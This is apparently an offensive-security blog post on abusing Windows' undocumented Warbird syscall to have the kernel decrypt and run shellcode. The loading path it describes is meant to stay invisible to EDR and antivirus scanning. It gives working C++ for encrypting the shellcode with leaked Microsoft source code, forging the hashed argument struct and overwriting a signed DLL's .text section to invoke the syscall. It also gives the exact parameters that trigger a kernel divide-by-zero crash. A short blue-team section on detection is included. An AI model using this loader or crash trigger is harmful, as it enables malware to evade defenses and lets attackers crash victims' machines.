Feistel Cipher
The custom Feistel cipher used by Warbird is a custom implementation and not documented at all by Microsoft.
Thankfully, a blog post by DownWithUp already documents how the Warbird API can be used to encrypt arbitrary data using a clever combination of syscalls to make the kernel perform the encryption for you. That way, we can use the kernel as a “black box” implementation of the Feistel cipher, without having to know the details of the cipher itself.
We experimented around with using their technique to encrypt data for the Warbird decryption routine but were unable to use the encrypted data with the runtime decryption. Lucky for us, a source code leak of the Warbird framework from 2017 contains a working implementation of the Feistel cipher used by Warbird, which we can use to encrypt our shellcode for the runtime decryption routine. This source code has been circulating on the internet for a while and has recently become available on GitHub.
Warbird Syscall
To request a decryption and allocation from the kernel, the process must call the NtQuerySystemInformation syscall with the SystemInformationClass set to SystemCodeFlowTransition (0xB9). Although this is not officially documented by Microsoft, thanks to the leak of Windows source code, we have access to a lot of information about this syscall. The syscall takes a pointer to a struct containing a WbOperationType that specifies the operation to be performed, and a pointer to a struct containing additional data for the operation. According to the leaked source code, the WbOperationType enum contains the following values:
typedef enum {
WbOperationNone,
WbOperationDecryptEncryptionSegment,
WbOperationReEncryptEncryptionSegment,
WbOperationHeapExecuteCall,
WbOperationHeapExecuteReturn,
WbOperationHeapExecuteUnconditionalBranch,
WbOperationHeapExecuteConditionalBranch,
WbOperationProcessEnd,
WbOperationProcessStartup,
} WbOperationType;
We will focus on the WbOperationHeapExecuteCall operation, which can be used to perform the described decryption and allocation routine in the kernel. The struct that is passed to the syscall for this operation is also part of the leaked source code but appears to have changed slightly since the leak. Combining the leak with the information from Alex Ionescu’s talk about Warbird at Ekoparty 2017, we can assume that the struct looks something like this:
typedef struct _HEAP_EXECUTE_CALL_ARGUMENT {
uint8_t ucHash[0x20];
uint32_t ulStructSize;
uint32_t ulZero;
uint32_t ulParametersRva;
uint32_t ulCheckStackSize;
uint32_t ulChecksum : CHECKSUM_BIT_COUNT;
uint32_t ulWrapperChecksum : CHECKSUM_BIT_COUNT;
uint32_t ulRva : RVA_BIT_COUNT;
uint32_t ulSize : FUNCTION_SIZE_BIT_COUNT;
uint32_t ulWrapperRva : RVA_BIT_COUNT;
uint32_t ulWrapperSize : FUNCTION_SIZE_BIT_COUNT;
uint64_t ullKey;
WarbirdRuntime::FEISTEL64_ROUND_DATA RoundData[NUMBER_FEISTEL64_ROUNDS];
} HEAP_EXECUTE_CALL_ARGUMENT, * PHEAP_EXECUTE_CALL_ARGUMENT;
We’ll only highlight the most important fields for our purposes:
- ucHash: A 32-byte SHA-256 hash of the following fields in the struct. If this hash does not match the hash of the rest of the struct, the kernel will refuse to perform the operation. This is used to prevent tampering with the struct, as the hash is calculated over the fields that are relevant for the decryption and allocation. Note that this hash does not provide authentication, only integrity, so an attacker could still modify the struct, given that they can calculate a new hash for the modified struct.
- ulStructSize: The size of the struct in bytes.
- ulRva: The offset of the encrypted code relative to the start of the struct in memory[1].
- ulSize: The size of the encrypted code in bytes.
- ullKey: The 8-byte key used for the Feistel cipher.
- RoundData: Configuration data for each round of the Feistel cipher.
All other fields are not relevant for our purposes and should be set to zero.
The complete struct passed to the syscall then simply contains the WbOperationType, the HEAP_EXECUTE_CALL_ARGUMENT struct, and a pointer to a NTSTATUS variable that will receive the result of the operation:
typedef struct _WB_OPERATION {
WarbirdRuntime::WbOperationType OperationType;
union {
// ...
PHEAP_EXECUTE_CALL_ARGUMENT pHeapExecuteCallArgument;
// ...
};
NTSTATUS* Result;
} WB_OPERATION, * PWB_OPERATION;
Abusing Warbird
As previously stated, only Microsoft services are intended to invoke Warbird syscalls. To enforce this, the Windows kernel requires the HEAP_EXECUTE_CALL_ARGUMENT struct to be in a memory region that is marked with a ImageSigningLevel of (12), which indicates that the memory region “belongs to” a Windows component. As already noted by DownWithUp, this check can quite easily be bypassed by first loading a Microsoft-signed DLL into your own process, and then using VirtualProtect(RW) and memcpy to change the contents of the DLL’s .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct. For our convenience, we place the encrypted shellcode directly after the struct in the .text section and set the ulRva field simply to the size of the struct. This way, the kernel will decrypt the shellcode directly after the struct in the same memory region.
After the data has been placed, the .text section must be marked as executable using VirtualProtect(RX) and can then be used to invoke the Warbird syscall.
Preparation
We first need to encrypt the shellcode we want to execute using the Feistel cipher. We can use the implementation from the leaked Warbird source code to do this:
BYTE shellcode[] = { ...};
BYTE encrypted[sizeof(shellcode)];
auto cipher = WarbirdCrypto::CCipherFeistel64::CreateRandom();
WarbirdCrypto::CChecksum checksum;
WarbirdCrypto::CKey key { .u64 = 0xdeadbeefcafeaffe };
cipher->Encrypt((BYTE*) shellcode, (BYTE*) encrypted, sizeof(shellcode), key, 0xf0, &checksum);
The WarbirdCrypto namespace can be taken directly from the leaked source code and #included in your project. The headers from the leaked source code are not functional on their own, and require some additional includes to work, as well as a workaround to use them outside of the WarbirdRuntime namespace:
#include <Windows.h>
#include <set>
#include <sstream>
#define WARBIRD_CRYPTO_ENABLE_CREATE_RANDOM
#include "../warbird-example/WarbirdCUtil.inl"
#include "../warbird-example/WarbirdRandom.inl"
#define Random WarbirdRuntime::g_Rand.Random
#include "../warbird-example/WarbirdCiphers.inl"
#undef Random
To load the encrypted shellcode, we need to create the HEAP_EXECUTE_CALL_ARGUMENT struct:
HEAP_EXECUTE_CALL_ARGUMENT params{
.ucHash = { }, // We'll leave this empty for now
.ulStructSize = sizeof(HEAP_EXECUTE_CALL_ARGUMENT),
.ulZero = 0,
.ulParametersRva = 0,
.ulCheckStackSize = 0,
.ulChecksum = 0,
.ulWrapperChecksum = 0,
.ulRva = sizeof(HEAP_EXECUTE_CALL_ARGUMENT), // shellcode starts right after the struct
.ulSize = static_cast<uint32_t>(sizeof(shellcode)),
.ulWrapperRva = 0,
.ulWrapperSize = 0,
.ullKey = key.u64,
.RoundData = { }
};
// Copy over the round configuration
memcpy(params.RoundData, cipher->m_Rounds, sizeof(cipher->m_Rounds));
// Lastly, calculate the hash of the struct
picosha2::hash256(
reinterpret_cast<uint8_t*>(¶ms.ulStructSize), // Start after the hash field
reinterpret_cast<uint8_t*>(¶ms + 1), // Up to the end of the struct
reinterpret_cast<uint8_t*>(¶ms.ucHash), // Store the hash here
reinterpret_cast<uint8_t*>(¶ms.ulStructSize) // End of the hash field
);
The picosha2 namespace is a simple SHA-256 implementation that can be found here.
Execution
After the data has been prepared, we can now load the Microsoft-signed DLL into our process, change the contents of the .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct and encrypted shellcode, mark the section as executable and finally call the Warbird API:
HMODULE clipc = LoadLibraryA("clipc.dll"); // Microsoft-signed DLL
if (clipc == NULL) return 1;
DWORD old;
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_READWRITE, &old);
memcpy(clipc, ¶ms, sizeof(params));
memcpy((uint8_t*)clipc + sizeof(params), &encrypted, sizeof(encrypted));
VirtualProtect(clipc, sizeof(params) + sizeof(encrypted), PAGE_EXECUTE_READ, &old);
NTSTATUS result = 0;
WB_OPERATION request{
.OperationType = WarbirdRuntime::WbOperationHeapExecuteCall,
.pHeapExecuteCallArgument = (PHEAP_EXECUTE_CALL_ARGUMENT)clipc,
.Result = &result
};
NTSTATUS status = NtQuerySystemInformation(SystemCodeFlowTransition, &request, sizeof(request), nullptr);
And that’s it! The kernel will now decrypt the shellcode, place it in the process’s memory and redirect execution to the beginning of the decrypted shellcode. Notice how we didn’t ever have to invoke any syscall with the decrypted shellcode as an argument? This is usually the case when loading shellcode, for example when calling VirtualProtect on a memory region to set it executable, the region usually already contains the decrypted shellcode and is used by EDR products as a point of detection by scanning the memory regions passed to the kernel for known signatures. This isn’t possible in our case: An EDR spying on syscalls and scanning associated memory regions will only “see” encrypted shellcode, and thus come up empty handed. The full code for the above example can found in our GitHub repository.
Limitations
We’ve now seen how we can load encrypted shellcode using the Warbird API, but there are some limitations to keep in mind:
- We still need to call VirtualProtect(RX) to change the permissions of the .text This could be detected as suspicious behaviour by some EDR products, but we haven’t seen any detections solely based on this pattern because the contents that are placed in the .text section are fully encrypted and thus not detectable as malicious shellcode.
- The functionality we’re abusing here was never intended to be used for entire shellcode payloads but rather for small, sensitive code blocks. The Warbird API limits the size of the encrypted code to 0x10000 bytes, so we cannot load any shellcode larger than 64 KiB. There might be ways to work around this limitation by dynamically loading and re-linking the shellcode, but this is left as an exercise for the reader 😉
We’ve not put much research effort into the other available operations, especially those not previously documented by DownWithUp, so these are probably a good starting point for further research.
Blue Team Perspective
This technique is very effective at bypassing existing shellcode loading detections. Typically, to simplify a bit, an anti-malware product might scan all memory addresses referenced by an application when calling a Windows API that could cause execution to start at that address, such as NtCreateThreadEx, or operations that cause memory to become executable, such as NtProtectVirtualMemory. The anti-malware product may then use a signature database or use pattern-based detection to determine whether the memory that is about to be executed is malicious or not. In some cases, an anti-malware product might simply block all operations that that allocate memory, mark the allocated memory as being executable and pass executed to the newly allocated memory, regardless of the actual memory content, especially if the executable performing these operations is not trustworthy by some metric. The technique presented here bypasses this scanning because the memory that we’re “supplying” as pointer arguments to the Windows API only contains encrypted shellcode. The address of the decrypted shellcode, which is allocated by the kernel itself, is not even passed back to userspace. Because the shellcode is decrypted and executed “in one go” by the kernel itself, any hooks on Windows API calls placed by an anti-malware product are bypassed.
To nonetheless detect this behaviour, an anti-malware product may opt to decrypt any shellcode passed to NtQuerySystemInformation itself and check the decrypted shellcode for known signatures, block any use of Warbird APIs in non-Microsoft processes, or may rely on behaviour detection and periodic memory scanning to detect the known malicious shellcode, once it has been decrypted by the kernel.
Conclusion
This is a very powerful technique, as it allows us to bypass most AV and EDR scrutiny. If an EDR product intercepts the syscall, it will only see the encrypted shellcode, and not the decrypted shellcode that is executed, so any signatures or heuristics that the EDR product uses to detect malicious shellcode will not trigger. We’ve successfully used this technique in practice to bypass multiple leading EDR solutions.
Bonus: BSOD
While researching and experimenting with Warbird, we encountered a bug in the Warbird API that can be used to trigger a blue screen of death. When allocating memory in the process’s heap, the kernel adds some randomness to the base address of the allocated memory, presumably as a kind of “Pseudo Adress Space Layout Randomization (ASLR)”. An implementation error in this allocation function causes a divide by zero in the kernel when the required size is between 0xffc1 and 0xffff:
uint32_t slot_count = (required_size + 63) / 64;
uint32_t rand_offset = ExGenRandom(1) % (1024 - slot_count);
Working backwards, when slot_count == 1024, the kernel will attempt a modulo operation with a divisor of zero, which will cause a division by zero in the kernel. Because slot_count is simply required_size divided by 64 (rounded up), the required size for this bug to trigger is 0xffc1 <= required_size <= 0xffff.
The value of required_size here is simply ulSize + 16, so any values for ulSize in the range from 0xffb1 to 0xfff0 will cause the division by zero. We have included a PoC for this bug in our GitHub repository.
Further Reading
[1] This is actually a bit more involved, as it is relative to the start of the current Warbird block. If we set ulParametersRva to zero though, the offset will be relative to the start of the struct. Refer to the talk by Alex Ionescu for more information.